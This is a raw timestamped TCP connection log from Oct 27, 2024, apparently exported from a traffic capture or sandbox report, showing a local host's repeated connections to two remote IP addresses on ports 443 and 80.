                                                                                                Oct 27, 2024 17:11:36.766433954 CET57914443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:36.766587019 CET57914443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:36.766611099 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:36.862191916 CET8057909152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:36.862466097 CET5790980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:37.565819979 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.567365885 CET57911443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.567379951 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.567960978 CET57911443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.567965984 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.574484110 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.574939013 CET57910443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.574984074 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.575484037 CET57910443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.575496912 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.575803041 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.575872898 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.576112986 CET57914443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.576148987 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.576545954 CET57913443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.576558113 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.576566935 CET57914443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.576580048 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.577032089 CET57913443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.577038050 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.578063965 CET4435791213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.579216003 CET57912443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.579231977 CET4435791213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.579685926 CET57912443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.579694986 CET4435791213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.694765091 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.694787979 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.694834948 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.694853067 CET57911443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.694900990 CET57911443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.695102930 CET57911443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.695116043 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.695123911 CET57911443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.695130110 CET4435791113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.698106050 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.698142052 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.698227882 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.698364019 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.698375940 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.708595991 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.708667040 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.708729029 CET57914443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.708838940 CET57914443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.708868980 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.708895922 CET57914443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.708911896 CET4435791413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.710140944 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.710165977 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.710242987 CET57910443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.710270882 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.710295916 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.710347891 CET57910443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.710732937 CET57910443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.710762024 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.710787058 CET57910443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.710800886 CET4435791013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.711807966 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.711846113 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.711852074 CET4435791213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.711914062 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.712001085 CET4435791213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.712025881 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.712037086 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.712060928 CET57912443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.712544918 CET57912443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.712562084 CET4435791213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.712584019 CET57912443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.712594032 CET4435791213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.714098930 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.714143038 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.714215040 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.714375973 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.714394093 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.714659929 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.714670897 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.714735031 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.714848042 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.714859009 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.717564106 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.718127012 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.718166113 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.718173981 CET57913443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.718209028 CET57913443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.718254089 CET57913443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.718261003 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.718271017 CET57913443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.718276024 CET4435791313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.720196009 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.720206976 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:37.720276117 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.720376968 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:37.720391989 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.369326115 CET5790980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:38.369750977 CET5792080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:38.375123978 CET8057909152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.375142097 CET8057920152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.375175953 CET5790980192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:38.375250101 CET5792080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:38.375391006 CET5792080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:38.380639076 CET8057920152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.421654940 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.422329903 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.422344923 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.423461914 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.423466921 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.447012901 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.447231054 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.447473049 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.447503090 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.447532892 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.447550058 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.448024988 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.448029995 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.448318005 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.448323011 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.457518101 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.457860947 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.457880020 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.458470106 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.458475113 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.466587067 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.466948986 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.466955900 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.467318058 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.467322111 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.553580046 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.554250956 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.554285049 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.554306030 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.554896116 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.554896116 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.554896116 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.556961060 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.556993961 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.557080030 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.557241917 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.557256937 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.576545954 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.576617002 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.576673031 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.576771975 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.576781988 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.576808929 CET57916443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.576814890 CET4435791613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.578202963 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.578349113 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.578403950 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.578433037 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.578437090 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.578452110 CET57918443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.578455925 CET4435791813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.579188108 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.579233885 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.579308033 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.579480886 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.579498053 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.580488920 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.580498934 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.580554962 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.580688953 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.580699921 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.594711065 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.594742060 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.594789982 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.594804049 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.594837904 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.594974041 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.594986916 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.595000029 CET57917443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.595005989 CET4435791713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.597173929 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.597208023 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.597291946 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.597449064 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.597464085 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.600208044 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.600229025 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.600261927 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.600282907 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.600307941 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.600406885 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.600411892 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.600425959 CET57919443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.600430012 CET4435791913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.602463961 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.602533102 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.602624893 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.602792025 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.602823019 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:38.865979910 CET57915443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:38.865992069 CET4435791513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.302932978 CET8057920152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.303021908 CET5792080192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:39.434010029 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.434607029 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.434639931 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.435178995 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.435193062 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.435653925 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.436024904 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.436053991 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.436486959 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.436495066 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.439202070 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.439547062 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.439577103 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.440097094 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.440104008 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.448208094 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.448448896 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.448681116 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.448690891 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.448770046 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.448785067 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.449357986 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.449362993 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.449420929 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.449424982 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.568923950 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.568967104 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.569035053 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.569294930 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.569314003 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.569327116 CET57921443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.569333076 CET4435792113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.571655035 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.571796894 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.571856976 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.571940899 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.571957111 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.571970940 CET57922443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.571985006 CET4435792213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.572408915 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.572436094 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.572499037 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.572685957 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.572700024 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.574388027 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.574438095 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.574536085 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.574625969 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.574651957 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.579849005 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.579940081 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.579992056 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.580004930 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.580054045 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.580082893 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.580096006 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.580106974 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.580106974 CET57923443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.580113888 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.580127954 CET4435792313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.581132889 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.582094908 CET57928443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.582128048 CET4435792813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.582191944 CET57928443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.582302094 CET57928443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.582319021 CET4435792813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.582957983 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.583017111 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.583045006 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.583053112 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.583060980 CET57924443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.583064079 CET4435792413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.585242033 CET57929443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.585275888 CET4435792913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.585371017 CET57929443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.585501909 CET57929443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.585517883 CET4435792913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.598463058 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.598527908 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.598587990 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.598824024 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.598838091 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.598850012 CET57925443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.598854065 CET4435792513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.601535082 CET57930443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.601546049 CET4435793013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:39.601629019 CET57930443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.601782084 CET57930443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:39.601792097 CET4435793013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.306548119 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.307002068 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.307028055 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.307466984 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.307478905 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.307796955 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.308100939 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.308120012 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.308459044 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.308464050 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.334506989 CET4435792913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.334568977 CET4435792813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.335036039 CET57929443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.335083961 CET4435792913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.335129976 CET57928443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.335144043 CET4435792813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.335376024 CET4435793013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.335458040 CET57928443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.335462093 CET4435792813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.335551023 CET57929443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.335566044 CET4435792913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.335669041 CET57930443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.335675001 CET4435793013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.335994959 CET57930443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.335999012 CET4435793013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.436146975 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.436217070 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.436259031 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.436270952 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.436315060 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.436352968 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.436475992 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.436494112 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.436501026 CET57926443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.436506987 CET4435792613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.437410116 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.437459946 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.437513113 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.437669039 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.437669039 CET57927443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:40.437694073 CET4435792713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:40.437717915 CET4435792713.107.246.51192.168.2.4
